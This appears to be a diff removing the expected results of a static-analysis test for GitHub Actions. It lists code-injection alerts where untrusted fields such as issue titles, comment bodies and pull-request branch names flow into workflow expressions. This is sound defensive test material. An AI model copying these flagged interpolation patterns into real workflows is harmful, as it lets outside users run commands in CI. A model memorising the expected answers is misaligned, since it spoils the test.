| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml |
-| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml |
-| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml |
